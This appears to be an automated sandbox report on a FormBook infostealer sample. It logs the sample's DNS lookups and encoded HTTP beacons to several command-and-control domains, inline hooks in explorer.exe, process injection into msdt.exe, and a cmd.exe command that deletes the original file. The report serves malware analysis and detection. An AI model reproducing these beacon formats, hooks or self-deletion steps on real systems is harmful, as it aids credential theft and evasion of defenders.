Jan 13, 2021 22:00:22.714339018 CET	8.8.8.8	192.168.2.3	0xcce9	No error (0)	www.sheilataman.com	sheilataman.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 22:00:22.714339018 CET	8.8.8.8	192.168.2.3	0xcce9	No error (0)	sheilataman.com		103.29.215.252	A (IP address)	IN (0x0001)
Jan 13, 2021 22:00:43.780431032 CET	8.8.8.8	192.168.2.3	0x3fd9	No error (0)	www.ehealthla.com		52.128.23.153	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.o-tanemaki.com

www.idahofallsobituaries.com

www.bhscsh.com

www.sheilataman.com

www.ehealthla.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49744	118.27.99.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:59:20.065716028 CET	8831	OUT	GET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1 Host: www.o-tanemaki.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:59:20.363631010 CET	8831	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Jan 2021 20:59:20 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.o-tanemaki.com/6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49745	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:59:40.684653044 CET	8832	OUT	GET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1 Host: www.idahofallsobituaries.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:59:40.823685884 CET	8833	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:59:40 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc8399-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49748	69.30.217.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 22:00:01.499761105 CET	8854	OUT	GET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1 Host: www.bhscsh.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 22:00:01.691947937 CET	8855	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Jan 2021 21:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 62 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 09 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e ed 8e 98 ec 9d b4 ec a7 80 eb a5 bc 20 ed 91 9c ec 8b 9c ed 95 a0 20 ec 88 98 20 ec 97 86 ec 8a b5 eb 8b 88 eb 8b a4 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 65 6d 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 38 37 2c 20 38 37 2c 20 38 37 29 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 eb a7 91 ec 9d 80 20 ea b3 a0 eb 94 95 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 76 65 72 64 61 6e 61 22 2c 20 22 61 72 69 61 6c 22 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 09 09 09 7d 0a 09 09 09 2e 6d 61 69 6e 43 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 37 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 30 70 78 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 32 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 32 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 72 67 62 28 33 39 2c 20 31 32 30 2c 20 32 33 36 29 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 eb a7 91 ec 9d 80 20 ea b3 a0 eb 94 95 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 76 65 72 64 61 6e 61 22 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 38 70 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 6f 74 74 6f 6d 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 09 09 7d 0a 09 09 09 2e 65 72 72 6f 72 45 78 70 6c 61 6e 61 74 69 6f 6e 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 eb a7 91 ec 9d 80 20 ea b3 a0 eb 94 95 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 76 65 72 64 61 6e 61 22 2c 20 22 61 72 69 61 6c 22 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 61 73 6b 53 65 63 74 69 6f 6e 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 61 73 6b 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 eb a7 91 ec 9d 80 20 ea b3 a0 eb 94 95 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 76 65 72 64 61 6e 61 22 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 32 35 70 78 3b 0a 09 09 09 7d 0a 09 09 09 6c 69 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 69 61 67 6e 6f 73 65 42 75 Data Ascii: bd2<!DOCTYPE HTML><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title> .</title> <style>body {margin: 0em; color: rgb(87, 87, 87); font-family: " ", "Segoe UI", "verdana", "arial"; background-repeat: repeat-x; background-color: white;}.mainContent {width: 700px; margin-top: 80px; margin-right: 120px; margin-left: 120px;}.title {color: rgb(39, 120, 236); font-family: " ", "Segoe UI", "verdana"; font-size: 38pt; font-weight: 300; margin-bottom: 20px; vertical-align: bottom; position: relative;}.errorExplanation {color: rgb(0, 0, 0); font-family: " ", "Segoe UI", "verdana", "arial"; font-size: 12pt; text-decoration: none;}.taskSection {margin-top: 20px; margin-bottom: 40px; position: relative;}.tasks {color: rgb(0, 0, 0); padding-top: 5px; font-family: " ", "Segoe UI", "verdana"; font-size: 12pt; font-weight: 200; margin-left: -25px;}li {margin-top: 8px;}.diagnoseBu
Jan 13, 2021 22:00:01.691981077 CET	8857	IN	Data Raw: 74 74 6f 6e 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 74 3b 0a 09 09 09 7d 0a 09 09 09 2e 77 65 62 70 61 67 65 55 52 4c 20 7b 0a 09 09 09 09 64 69 72 65 63 74 69 6f 6e 3a 20 6c 74 72 3b 0a 09 09 09 7d 0a 09 09 09 2e 68 69 64 64 Data Ascii: tton {font-size: 9pt;}.webpageURL {direction: ltr;}.hidden {display: none;}a {color: rgb(0, 102, 204); font-family: " ", "Segoe UI", "verdana", "arial"; font-size: 11pt; text-decoration:
Jan 13, 2021 22:00:01.691993952 CET	8857	IN	Data Raw: a8 eb 93 9c ea b0 80 20 ea ba bc ec a0 b8 20 ec 9e 88 eb 8a 94 ec a7 80 20 ed 99 95 ec 9d b8 ed 95 98 ec 84 b8 ec 9a 94 2e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 69 64 3d 22 74 61 73 6b 32 2d 33 Data Ascii: .</li> <li id="task2-3"> .</li> <li id="task2-4"> .
Jan 13, 2021 22:00:01.692003012 CET	8857	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49749	103.29.215.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 22:00:22.935165882 CET	8858	OUT	GET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1 Host: www.sheilataman.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 22:00:23.533673048 CET	8859	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Jan 2021 21:00:22 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://sheilataman.com/6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49750	52.128.23.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 22:00:43.833502054 CET	8860	OUT	GET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1 Host: www.ehealthla.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 22:00:43.884119034 CET	8860	IN	HTTP/1.1 463 Server: nginx Date: Wed, 13 Jan 2021 21:00:43 GMT Content-Type: text/html Content-Length: 8915 Connection: close ETag: "5e52d3c2-22d3" X-DIS-Request-ID: 1b5ceba3c5d5b991c6e7d017fd2df245 Set-Cookie: dis-remote-addr=84.17.52.74 Set-Cookie: dis-timestamp=2021-01-13T13:00:43-08:00 Set-Cookie: dis-request-id=1b5ceba3c5d5b991c6e7d017fd2df245 X-Frame-Options: sameorigin
Jan 13, 2021 22:00:43.884176016 CET	8862	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"
Jan 13, 2021 22:00:43.884228945 CET	8863	IN	Data Raw: 6e 73 5f 73 70 61 63 65 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 77 69 64 74 68 3d 22 31 38 22 20 68 65 69 67 68 74 3d 22 31 38 22 20 2f 3e 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 38 22 3e 3c 69 6d 67 20 73 72 Data Ascii: ns_spacer.png" alt="" width="18" height="18" /></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" alt="" width="18" height="18" /></td> </tr> <tr> <td width="18"><img src="/DOAError/assets/i
Jan 13, 2021 22:00:43.884279966 CET	8864	IN	Data Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 38 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 44 4f 41 45 72 72 6f 72 2f 61 73 Data Ascii: > </tr> </table></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="18" height="55" /></td> </tr> <tr> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spa
Jan 13, 2021 22:00:43.884332895 CET	8866	IN	Data Raw: 70 6e 67 22 20 77 69 64 74 68 3d 22 31 30 22 20 68 65 69 67 68 74 3d 22 31 32 30 22 20 61 6c 74 3d 22 22 2f 3e 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 35 30 30 22 20 Data Ascii: png" width="10" height="120" alt=""/></td> <td width="500" align="center" class="errortitle">463</td> <td width="109" align="center"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width
Jan 13, 2021 22:00:43.884383917 CET	8867	IN	Data Raw: 69 6d 61 67 65 74 65 78 74 22 3e 48 6f 73 74 3c 62 72 20 2f 3e 0d 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 78 2d 73 6d 61 6c 6c 22 20 69 64 3d 22 68 6f 73 74 32 22 3e 3c 2f 73 70 61 6e 3e 3c 73 63 72 69 70 74 3e Data Ascii: imagetext">Host<br /><span style="font-size: x-small" id="host2"></span><script>function myFunction2() { var x = location.host; document.getElementById("host2").innerHTML = x;}</script></td> </tr>
Jan 13, 2021 22:00:43.884445906 CET	8869	IN	Data Raw: 67 6e 3d 22 63 65 6e 74 65 72 22 3e 7c 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 33 30 25 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 Data Ascii: gn="center">\|</td> <td width="30%" align="center"><table border="0" cellpadding="0" cellspacing="0"> <tbody> <tr> <td nowrap="nowrap"><div id="idtext"> Your IP Add
Jan 13, 2021 22:00:43.884536028 CET	8870	IN	Data Raw: 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 3e 3c 70 20 63 6c 61 73 73 3d 22 62 6f 64 79 74 65 78 74 22 3e 3c 73 74 72 6f 6e 67 3e 34 36 33 Data Ascii: <tr> <td align="left" valign="top"><p class="bodytext"><strong>463 Restricted Client: </strong>This resource is not available for access by your client software. This request has been blocked. Please retry your request from a

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE2
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE2
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE2
GetMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE2

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SKM_C36821010708320.exe PID: 4740 Parent PID: 5464

General

Start time:	21:58:09
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\SKM_C36821010708320.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SKM_C36821010708320.exe'
Imagebase:	0x9d0000
File size:	784896 bytes
MD5 hash:	15D8096422D137C7388908BB2BE61EC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: SKM_C36821010708320.exe PID: 1928 Parent PID: 4740

General

Start time:	21:58:16
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\SKM_C36821010708320.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SKM_C36821010708320.exe
Imagebase:	0xb50000
File size:	784896 bytes
MD5 hash:	15D8096422D137C7388908BB2BE61EC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 1928

General

Start time:	21:58:18
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msdt.exe PID: 1736 Parent PID: 3388

General

Start time:	21:58:32
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msdt.exe
Imagebase:	0xb60000
File size:	1508352 bytes
MD5 hash:	7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4952 Parent PID: 1736

General

Start time:	21:58:36
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
Imagebase:	0xe10000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4548 Parent PID: 4952

General

Start time:	21:58:37
Start date:	13/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SKM_C36821010708320.exe PID: 4740 Parent PID: 5464 SKM_C36821010708320.exeCOMMON

Executed Functions

Function 060C99A0, Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

;, xrefs: 060C9BE1

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 9589878cd919b7d8707f6ab4e615114550d7864c49151277544a0642ac65e777
Instruction ID: 4a935ca053f1879986f19665c20c42ea685ec350f81d088eb5238f8f5b8c7352
Opcode Fuzzy Hash: 9589878cd919b7d8707f6ab4e615114550d7864c49151277544a0642ac65e777
Instruction Fuzzy Hash: F171F571D51229CFDB64CF66C844BEDBBB2BB89310F1082EAD509A7250EB755AC4DF80

Uniqueness

Uniqueness Score: -1.00%

Function 060CB410, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d8d3558606d0e6d17782d93f3ee6c94e2f196c254fb76ab78c18cafc3908e3
Instruction ID: 209e18df994ccb1b9fa5dcfb7250c8ca93fac22c67da0c18abdf6d689daf15a2
Opcode Fuzzy Hash: 86d8d3558606d0e6d17782d93f3ee6c94e2f196c254fb76ab78c18cafc3908e3
Instruction Fuzzy Hash: 35117930D482588FDB54CFA5D459BEEBFF1BB4E321F14906AE401B3290C7788984DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0524BAD9, Relevance: 6.1, APIs: 4, Instructions: 123threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0524BB48
GetCurrentThread.KERNEL32 ref: 0524BB85
GetCurrentProcess.KERNEL32 ref: 0524BBC2
GetCurrentThreadId.KERNEL32 ref: 0524BC1B

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4ccbf00c88896d98e4dc076b78101cf42dbb33926f0d80dcf90ec583f0b2b6e6
Instruction ID: a79e4928849e2a31363f388f940418663a7c8106211941473067f54d62ae29f5
Opcode Fuzzy Hash: 4ccbf00c88896d98e4dc076b78101cf42dbb33926f0d80dcf90ec583f0b2b6e6
Instruction Fuzzy Hash: 265133B09146498FDB14CFA9D988BDEBBF0AF48304F24C49AE419A73A0D774A844CF65

Uniqueness

Uniqueness Score: -1.00%

